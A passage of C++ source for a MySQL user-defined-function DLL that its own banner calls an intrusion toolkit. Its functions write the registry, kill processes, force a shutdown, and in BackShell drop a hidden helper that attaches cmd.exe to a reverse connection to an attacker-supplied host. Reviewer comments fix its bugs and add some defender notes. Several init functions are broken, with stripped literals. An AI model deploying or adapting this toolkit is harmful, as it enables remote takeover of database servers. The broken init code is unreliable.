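    DWORD type, disposition, dword = 0, nbytes;
    const BYTE *bytes;
    LONG rc;
    unsigned i;

    free(initid->ptr);
    initid->ptr = NULL;

    if (args->arg_count != 5)
        return regwrite_reply(initid, length, is_null, usage);
    for (i = 0; i < 5; i++) {
        if (args->arg_type[i] != STRING_RESULT || args->args[i] == NULL)
            return regwrite_reply(initid, length, is_null, usage);
    }

    regwrite_arg(args, 0, root, sizeof root);
    regwrite_arg(args, 1, subkey, sizeof subkey);
    regwrite_arg(args, 2, name, sizeof name);
    regwrite_arg(args, 3, typname, sizeof typname);
    memset(data, 0, sizeof data);
    regwrite_arg(args, 4, data, DATA_MAX);
    if (stricmp(root, "help") == 0)
        return regwrite_reply(initid, length, is_null, usage);

    if (!regwrite_root(root, &hroot)) {
        _snprintf(msg, sizeof msg, "未知的注册表句柄:%s\r\n", root);
        msg[sizeof msg - 1] = '\0';
        return regwrite_reply(initid, length, is_null, msg);
    }
    if (!regwrite_type(typname, &type)) {
        _snprintf(msg, sizeof msg, "未知的注册表值类型:%s\r\n", typname);
        msg[sizeof msg - 1] = '\0';
        return regwrite_reply(initid, length, is_null, msg);
    }

    /* Encode the data for the declared type. REG_DWORD_LITTLE_ENDIAN is the same
     * constant as REG_DWORD, so it takes the first case. */
    switch (type) {
    case REG_DWORD:
    case REG_DWORD_BIG_ENDIAN: {
        char *end;
        unsigned long v = strtoul(data, &end, 0);
        if (end == data || *end != '\0')
            return regwrite_reply(initid, length, is_null, "REG_DWORD 的值必须是数字\r\n");
        dword = (DWORD)v;
        if (type == REG_DWORD_BIG_ENDIAN)
            dword = (dword >> 24) | ((dword >> 8) & 0xff00u) | ((dword << 8) & 0xff0000u) | (dword << 24);
        bytes = (const BYTE *)&dword;
        nbytes = sizeof dword;
        break;
    }
    case REG_MULTI_SZ:
        bytes = (const BYTE *)data;
        nbytes = (DWORD)strlen(data) + 2;   /* list terminator: two NULs */
        break;
    default:
        bytes = (const BYTE *)data;
        nbytes = (DWORD)strlen(data) + 1;
        break;
    }

    /* KEY_SET_VALUE is all that RegSetValueEx needs; the original asked for KEY_ALL_ACCESS. */
    rc = RegCreateKeyEx(hroot, subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hkey, &disposition);
    if (rc == ERROR_SUCCESS) {
        rc = RegSetValueEx(hkey, name, 0, type, bytes, nbytes);
        RegCloseKey(hkey);
    }
    return regwrite_reply(initid, length, is_null,
                          rc == ERROR_SUCCESS ? "写注册表成功\r\n" : "写注册表失败,可能是您的权限不够\r\n");
}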
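/* Per-statement teardown for regwrite(): free the last result buffer and clear the
 * pointer so UDF_INIT holds no dangling reference. free(NULL) is a no-op. */
extern "C" __declspec(dllexport)void regwrite_deinit(UDF_INIT *initid)
{
    free(initid->ptr);
    initid->ptr = NULL;
}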
//--------------------------------------------------------------------------------------------------------------------------KillProcess
/* Per-statement setup for KillProcess(); called once before the first row.
 * No argument validation here; KillProcess() returns its usage text instead.
 * NOTE(review): numeric literals were stripped from this listing — `max_length=**`
 * and the bare `return` are extraction damage; by the comment convention the
 * function returns 0 (success). */
extern "C" __declspec(dllexport)my_bool KillProcess_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
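/* Copy UDF string argument i into a bounded, NUL-terminated buffer (MySQL string
 * arguments are not guaranteed NUL-terminated; args->lengths[i] has the length). */
static void killprocess_arg(const UDF_ARGS *args, unsigned i, char *dst, size_t cap)
{
    size_t n = 0;
    if (args->args[i] != NULL) {
        n = (size_t)args->lengths[i];
        if (n >= cap)
            n = cap - 1;
        memcpy(dst, args->args[i], n);
    }
    dst[n] = '\0';
}

/* Return a heap copy of msg via initid->ptr (freed in KillProcess_deinit); SQL NULL on OOM. */
static char *killprocess_reply(UDF_INIT *initid, unsigned long *length, char *is_null, const char *msg)
{
    size_t n = strlen(msg);
    initid->ptr = (char *)malloc(n + 1);
    if (initid->ptr == NULL) {
        *is_null = 1;
        return NULL;
    }
    memcpy(initid->ptr, msg, n + 1);
    *length = (unsigned long)n;
    return initid->ptr;
}

/* KillProcess(name_or_decimal_pid): terminate the first process whose image name
 * (case-insensitive) or decimal PID matches. Only the first match is killed, so a
 * name shared by several processes kills one of them.
 * Fixes relative to the original: the argument was strcpy'd into a MAX_PATH buffer
 * unbounded, the snapshot/Process32First/OpenProcess results were never checked,
 * and the previous row's result buffer was leaked. */
extern "C" __declspec(dllexport)char *KillProcess(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
    static const char usage[] = "结束进程函数.\r\n例:select KillProcess(\"进程名 或 进程ID(十进制)\");\r\n程序目前还不能结束系统进程.";
    char target[MAX_PATH], pidtext[16], msg[MAX_PATH + 64];
    HANDLE snap, proc;
    PROCESSENTRY32 pe;
    DWORD pid = 0;
    BOOL killed = FALSE;

    free(initid->ptr);
    initid->ptr = NULL;

    if (args->arg_count != 1 || args->arg_type[0] != STRING_RESULT || args->args[0] == NULL)
        return killprocess_reply(initid, length, is_null, usage);
    killprocess_arg(args, 0, target, sizeof target);
    if (strcmp(target, "help") == 0)   /* case-sensitive here, as in the original */
        return killprocess_reply(initid, length, is_null, usage);

    snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap != INVALID_HANDLE_VALUE) {
        pe.dwSize = sizeof pe;
        if (Process32First(snap, &pe)) {
            do {
                _snprintf(pidtext, sizeof pidtext, "%lu", (unsigned long)pe.th32ProcessID);
                pidtext[sizeof pidtext - 1] = '\0';
                if (stricmp(pe.szExeFile, target) == 0 || stricmp(pidtext, target) == 0) {
                    pid = pe.th32ProcessID;
                    break;
                }
            } while (Process32Next(snap, &pe));
        }
        CloseHandle(snap);
    }
    if (pid == 0) {
        _snprintf(msg, sizeof msg, "找不到进程%s,请确认进程是否存在!", target);
        msg[sizeof msg - 1] = '\0';
        return killprocess_reply(initid, length, is_null, msg);
    }

    /* PROCESS_TERMINATE is granted by the target's DACL; protected/system processes
     * typically refuse it, which is what the failure message below reports. */
    proc = OpenProcess(PROCESS_TERMINATE, FALSE, pid);
    if (proc != NULL) {
        killed = TerminateProcess(proc, 0);
        CloseHandle(proc);
    }
    _snprintf(msg, sizeof msg, killed ? "%s进程成功终止." : "%s进程终止失败,您的权限可能不足.", target);
    msg[sizeof msg - 1] = '\0';
    return killprocess_reply(initid, length, is_null, msg);
}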
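/* Per-statement teardown for KillProcess(): free the last result buffer and clear
 * the pointer so UDF_INIT holds no dangling reference. free(NULL) is a no-op. */
extern "C" __declspec(dllexport)void KillProcess_deinit(UDF_INIT *initid)
{
    free(initid->ptr);
    initid->ptr = NULL;
}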
//--------------------------------------------------------------------------------------------------------------------------ProcessView
/* Per-statement setup for ProcessView(); called once before the first row.
 * NOTE(review): numeric literals were stripped from this listing — `max_length=**`
 * and the bare `return` are extraction damage; by the comment convention the
 * function returns 0 (success). max_length bounds what MySQL accepts from
 * ProcessView(), whose output grows with the number of processes. */
extern "C" __declspec(dllexport)my_bool ProcessView_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
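/* Append s to a growable heap string. Returns 0 (and leaves *buf valid) if realloc fails. */
static int processview_append(char **buf, size_t *len, size_t *cap, const char *s)
{
    size_t n = strlen(s);
    if (*len + n + 1 > *cap) {
        size_t ncap = *cap ? *cap * 2 : 4096;
        char *tmp;
        while (ncap < *len + n + 1)
            ncap *= 2;
        tmp = (char *)realloc(*buf, ncap);
        if (tmp == NULL)
            return 0;
        *buf = tmp;
        *cap = ncap;
    }
    memcpy(*buf + *len, s, n + 1);
    *len += n;
    return 1;
}

/* ProcessView(): list every process as "image\tpid\r\n" lines.
 * Fixes relative to the original: the output was strcat'd into a fixed-size malloc
 * with no bound check (heap overflow on hosts with many processes), the snapshot
 * result was not checked, and the previous row's result buffer was leaked. */
extern "C" __declspec(dllexport)char *ProcessView(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
    static const char usage[] = "枚举进程函数.\r\n例:select ProcessView();";
    char *out = NULL;
    size_t len = 0, cap = 0;
    char line[MAX_PATH + 32];
    HANDLE snap;
    PROCESSENTRY32 pe;

    free(initid->ptr);
    initid->ptr = NULL;

    if (args->arg_count != 0) {
        size_t n = strlen(usage);
        initid->ptr = (char *)malloc(n + 1);
        if (initid->ptr == NULL) {
            *is_null = 1;
            return NULL;
        }
        memcpy(initid->ptr, usage, n + 1);
        *length = (unsigned long)n;
        return initid->ptr;
    }

    snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap != INVALID_HANDLE_VALUE) {
        pe.dwSize = sizeof pe;
        if (Process32First(snap, &pe)) {
            do {
                _snprintf(line, sizeof line, "%s\t%lu\r\n", pe.szExeFile, (unsigned long)pe.th32ProcessID);
                line[sizeof line - 1] = '\0';
                if (!processview_append(&out, &len, &cap, line))
                    break;   /* out of memory: return what was collected so far */
            } while (Process32Next(snap, &pe));
        }
        CloseHandle(snap);
    }

    if (out == NULL) {
        /* nothing collected (snapshot failed or first append failed): empty string, not NULL */
        out = (char *)malloc(1);
        if (out == NULL) {
            *is_null = 1;
            return NULL;
        }
        out[0] = '\0';
        len = 0;
    }
    initid->ptr = out;
    *length = (unsigned long)len;
    return initid->ptr;
}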
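/* Per-statement teardown for ProcessView(): free the last result buffer and clear
 * the pointer so UDF_INIT holds no dangling reference. free(NULL) is a no-op. */
extern "C" __declspec(dllexport)void ProcessView_deinit(UDF_INIT *initid)
{
    free(initid->ptr);
    initid->ptr = NULL;
}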
//--------------------------------------------------------------------------------------------------------------------------WindowsExit
/* Per-statement setup for WindowsExit(); called once before the first row.
 * No argument validation here; WindowsExit() returns its usage text instead.
 * NOTE(review): numeric literals were stripped from this listing — `max_length=**`
 * and the bare `return` are extraction damage; by the comment convention the
 * function returns 0 (success). */
extern "C" __declspec(dllexport)my_bool WindowsExit_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
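/* Copy UDF string argument i into a bounded, NUL-terminated buffer (MySQL string
 * arguments are not guaranteed NUL-terminated; args->lengths[i] has the length). */
static void windowsexit_arg(const UDF_ARGS *args, unsigned i, char *dst, size_t cap)
{
    size_t n = 0;
    if (args->args[i] != NULL) {
        n = (size_t)args->lengths[i];
        if (n >= cap)
            n = cap - 1;
        memcpy(dst, args->args[i], n);
    }
    dst[n] = '\0';
}

/* Return a heap copy of msg via initid->ptr (freed in WindowsExit_deinit); SQL NULL on OOM. */
static char *windowsexit_reply(UDF_INIT *initid, unsigned long *length, char *is_null, const char *msg)
{
    size_t n = strlen(msg);
    initid->ptr = (char *)malloc(n + 1);
    if (initid->ptr == NULL) {
        *is_null = 1;
        return NULL;
    }
    memcpy(initid->ptr, msg, n + 1);
    *length = (unsigned long)n;
    return initid->ptr;
}

/* WindowsExit("logoff"|"shutdown"|"reboot"): enable SeShutdownPrivilege on mysqld's
 * token and call ExitWindowsEx with EWX_FORCE.
 * Fixes relative to the original: the mode string is validated before the token is
 * touched (a typo used to leave the privilege enabled anyway), the token handle is
 * closed (it leaked), AdjustTokenPrivileges' ERROR_NOT_ALL_ASSIGNED is honoured (the
 * call returns success even when the privilege is not in the token), and the
 * previous row's result buffer is freed.
 * NOTE(review): ExitWindowsEx acts on the calling process's session; when mysqld runs
 * as a service that is not the interactive session, so "logoff" may not log off the
 * console user — confirm on the target host. */
extern "C" __declspec(dllexport)char *WindowsExit(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
    static const char usage[] = "关机重启注销函数.\r\n例:select WindowsExit(\"logoff|shutdown|reboot\");";
    char mode[32], msg[160];
    UINT flags;
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    BOOL adjusted;
    DWORD adjerr;

    free(initid->ptr);
    initid->ptr = NULL;

    if (args->arg_count != 1 || args->arg_type[0] != STRING_RESULT || args->args[0] == NULL)
        return windowsexit_reply(initid, length, is_null, usage);
    windowsexit_arg(args, 0, mode, sizeof mode);
    if (stricmp(mode, "help") == 0)
        return windowsexit_reply(initid, length, is_null, usage);

    if (stricmp(mode, "logoff") == 0)
        flags = EWX_LOGOFF | EWX_FORCE;
    else if (stricmp(mode, "shutdown") == 0)
        flags = EWX_SHUTDOWN | EWX_FORCE;
    else if (stricmp(mode, "reboot") == 0)
        flags = EWX_REBOOT | EWX_FORCE;
    else {
        _snprintf(msg, sizeof msg, "未知的参数%s,期望为logoff、shutdown、reboot中的一个.\r\n", mode);
        msg[sizeof msg - 1] = '\0';
        return windowsexit_reply(initid, length, is_null, msg);
    }

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
        return windowsexit_reply(initid, length, is_null, "获得进程访问信令出错,您的权限可能不足.\r\n");
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tp.Privileges[0].Luid)) {
        CloseHandle(hToken);
        return windowsexit_reply(initid, length, is_null, "获得关机令牌出错,您的权限可能不足.\r\n");
    }
    adjusted = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof tp, NULL, NULL);
    adjerr = GetLastError();
    CloseHandle(hToken);
    if (!adjusted || adjerr == ERROR_NOT_ALL_ASSIGNED)
        return windowsexit_reply(initid, length, is_null, "获得关机令牌出错,您的权限可能不足.\r\n");

    if (ExitWindowsEx(flags, 0))
        return windowsexit_reply(initid, length, is_null, "成功执行.\r\n");
    return windowsexit_reply(initid, length, is_null, "执行失败,您的权限可能不足.\r\n");
}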
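/* Per-statement teardown for WindowsExit(): free the last result buffer and clear
 * the pointer so UDF_INIT holds no dangling reference. free(NULL) is a no-op. */
extern "C" __declspec(dllexport)void WindowsExit_deinit(UDF_INIT *initid)
{
    free(initid->ptr);
    initid->ptr = NULL;
}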
//--------------------------------------------------------------------------------------------------------------------------BackShell
/* Per-statement setup for BackShell(); called once before the first row.
 * No argument validation here; BackShell() returns its usage text instead.
 * NOTE(review): numeric literals were stripped from this listing — `max_length=**`
 * and the bare `return` are extraction damage; by the comment convention the
 * function returns 0 (success). */
extern "C" __declspec(dllexport)my_bool BackShell_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
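/* Copy UDF string argument i into a bounded, NUL-terminated buffer (MySQL string
 * arguments are not guaranteed NUL-terminated; args->lengths[i] has the length). */
static void backshell_arg(const UDF_ARGS *args, unsigned i, char *dst, size_t cap)
{
    size_t n = 0;
    if (args->args[i] != NULL) {
        n = (size_t)args->lengths[i];
        if (n >= cap)
            n = cap - 1;
        memcpy(dst, args->args[i], n);
    }
    dst[n] = '\0';
}

/* Return a heap copy of msg via initid->ptr (freed in BackShell_deinit); SQL NULL on OOM. */
static char *backshell_reply(UDF_INIT *initid, unsigned long *length, char *is_null, const char *msg)
{
    size_t n = strlen(msg);
    initid->ptr = (char *)malloc(n + 1);
    if (initid->ptr == NULL) {
        *is_null = 1;
        return NULL;
    }
    memcpy(initid->ptr, msg, n + 1);
    *length = (unsigned long)n;
    return initid->ptr;
}

/* BackShell(host, port): write the embedded "BIN" resource IDR_BIN2 to
 * %TEMP%\347win.exe and launch it hidden as
 *   <temp>\347win.exe -e <system32>\cmd.exe <host> <port>
 * i.e. the dropped helper is expected to attach cmd.exe to an outbound connection
 * to host:port. The dropped file is never deleted, so it remains a durable on-disk
 * artifact; the live indicator is the process tree mysqld.exe -> 347win.exe -> cmd.exe
 * plus an outbound connection from the database host.
 * Fixes relative to the original: sprintf() was called with its destination buffer
 * as a source argument (undefined behaviour), the command line and paths were built
 * with unbounded strcat/sprintf into fixed buffers, WriteFile wrote size+1 bytes
 * (one past the resource image) and was unchecked, a resource handle was passed to
 * GlobalFree, the long long port was printed with %d, and the previous row's result
 * buffer was leaked. */
extern "C" __declspec(dllexport)char *BackShell(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
    static const char usage[] = "反弹shell.\r\n例:select BackShell(\"your IP\",your port);";
    static const char dropname[] = "\\347win.exe";
    static const char cmdname[] = "\\cmd.exe";
    char host[256], path[MAX_PATH], cmdexe[MAX_PATH], cmd[2 * MAX_PATH + 300];
    HRSRC hrsrc;
    HGLOBAL hglobal;
    HANDLE hFile;
    DWORD size, written = 0, n;
    long port;
    BOOL ok;
    int cmdlen;

    free(initid->ptr);
    initid->ptr = NULL;

    if (args->arg_count != 2 || args->arg_type[0] != STRING_RESULT || args->arg_type[1] != INT_RESULT
        || args->args[0] == NULL || args->args[1] == NULL)
        return backshell_reply(initid, length, is_null, usage);
    backshell_arg(args, 0, host, sizeof host);
    if (stricmp(host, "help") == 0)
        return backshell_reply(initid, length, is_null, usage);
    /* INT_RESULT arguments arrive as a long long; a port fits in a long, and old
     * MSVC CRTs do not understand %lld. */
    port = (long)*((long long *)args->args[1]);

    n = GetEnvironmentVariable("temp", path, sizeof path);
    if (n == 0 || n + sizeof dropname > sizeof path)
        return backshell_reply(initid, length, is_null, "创建临时文件出错,BackShell无法继续运行.");
    strcat(path, dropname);

    hrsrc = FindResource((HMODULE)g_module, MAKEINTRESOURCE(IDR_BIN2), "BIN");
    if (hrsrc == NULL)
        return backshell_reply(initid, length, is_null, "查找资源出错,BackShell无法继续运行.");
    size = SizeofResource((HMODULE)g_module, hrsrc);
    hglobal = LoadResource((HMODULE)g_module, hrsrc);
    if (hglobal == NULL)
        return backshell_reply(initid, length, is_null, "载入资源出错,BackShell无法继续运行.");

    hFile = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
        return backshell_reply(initid, length, is_null, "创建临时文件出错,BackShell无法继续运行.");
    ok = WriteFile(hFile, LockResource(hglobal), size, &written, NULL);
    CloseHandle(hFile);
    if (!ok || written != size) {
        DeleteFile(path);
        return backshell_reply(initid, length, is_null, "创建临时文件出错,BackShell无法继续运行.");
    }
    /* No GlobalFree: a Win32 LoadResource handle is not GlobalAlloc memory. */

    n = GetSystemDirectory(cmdexe, sizeof cmdexe);
    if (n == 0 || n + sizeof cmdname > sizeof cmdexe)
        return backshell_reply(initid, length, is_null, "执行失败\r\n");
    strcat(cmdexe, cmdname);

    cmdlen = _snprintf(cmd, sizeof cmd, "%s -e %s %s %ld", path, cmdexe, host, port);
    if (cmdlen < 0 || (size_t)cmdlen >= sizeof cmd)
        return backshell_reply(initid, length, is_null, "执行失败\r\n");

    /* WinExec reports success with a value greater than 31. */
    if (WinExec(cmd, SW_HIDE) > 31)
        return backshell_reply(initid, length, is_null, "执行成功\r\n");
    return backshell_reply(initid, length, is_null, "执行失败\r\n");
}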
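/* Per-statement teardown for BackShell(): free the last result buffer and clear
 * the pointer so UDF_INIT holds no dangling reference. free(NULL) is a no-op. */
extern "C" __declspec(dllexport)void BackShell_deinit(UDF_INIT *initid)
{
    free(initid->ptr);
    initid->ptr = NULL;
}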
//--------------------------------------------------------------------------------------------------------------------------about
/* Per-statement setup for about(); called once before the first row.
 * NOTE(review): numeric literals were stripped from this listing — `max_length=**`
 * and the bare `return` are extraction damage; by the comment convention the
 * function returns 0 (success). */
extern "C" __declspec(dllexport)my_bool about_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
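/* about(): return the DLL's banner and function list. Arguments are ignored, as before.
 * The buffer is sized from the text itself instead of a fixed malloc followed by an
 * unchecked strcat chain, and the previous row's buffer is freed first.
 * One text change: the "删除函数" line now shows DROP FUNCTION, which is the MySQL
 * statement; "delete function" is not valid syntax.
 * Defender notes grounded in this text: CREATE FUNCTION ... SONAME needs INSERT on
 * mysql.func (DROP needs DELETE) and a DLL the server can load, so denying those
 * privileges and write access to the plugin directory blocks the whole toolkit; the
 * banner string "mysql 入侵必备dll" and the function names below make the DLL
 * trivially identifiable in a scan of loaded/installed plugins. */
extern "C" __declspec(dllexport)char *about(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
    static const char *const lines[] = {
        "mysql 入侵必备dll 版本1.0.0.1\r\n\r\n",
        "程序经多次测试,不太可能会造成MYSQL假死.\r\n",
        "注意:要使用本dll你必须有对mysql的insert和delete权限以创建和删除函数。\r\n\r\n",
        "使用方法:\r\n",
        "创建函数:create function 函数名(区分大小写) returns string soname \"dll名\" (注意路径);\r\n",
        "删除函数:drop function 函数名;\r\n",
        "使用函数:select 函数名(参数列表);获取参数信息可使用select 函数名(\"help\");\r\n",
        "--------------------------------------------------------------------\r\n",
        "本dll包含的函数:\r\n",
        "cmdshell 执行cmd;\r\n",
        "downloader 下载者,到网上下载指定文件并保存到指定目录;\r\n",
        "open3389 通用开3389终端服务,可指定端口(不改端口无需重启);\r\n",
        "BackShell 反弹Shell;\r\n",
        "ProcessView 枚举系统进程;\r\n",
        "KillProcess 终止指定进程;\r\n",
        "regread 读注册表;\r\n",
        "regwrite 写注册表;\r\n",
        "WindowsExit 关机,注销,重启;\r\n",
        "about 本函数;\r\n",
        "--------------------------------------------------------------------\r\n",
        "使用过程中发现的bug可和我联系QQ:185826531(langouster)\r\n",
        "源程序公开,可以任意修改和添加功能,散布源程序请注明原作者.\r\n\r\n",
        "特别声明:并程序只供技术研究之用,不正当使用程序造成的后果作者概不负责!",
    };
    size_t i, total = 0;
    char *p;

    free(initid->ptr);
    initid->ptr = NULL;

    for (i = 0; i < sizeof lines / sizeof lines[0]; i++)
        total += strlen(lines[i]);
    initid->ptr = (char *)malloc(total + 1);
    if (initid->ptr == NULL) {
        *is_null = 1;
        return NULL;
    }
    p = initid->ptr;
    for (i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        size_t n = strlen(lines[i]);
        memcpy(p, lines[i], n);
        p += n;
    }
    *p = '\0';
    *length = (unsigned long)total;
    return initid->ptr;
}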
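/* Per-statement teardown for about(): free the last result buffer and clear the
 * pointer so UDF_INIT holds no dangling reference. free(NULL) is a no-op. */
extern "C" __declspec(dllexport)void about_deinit(UDF_INIT *initid)
{
    free(initid->ptr);
    initid->ptr = NULL;
}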
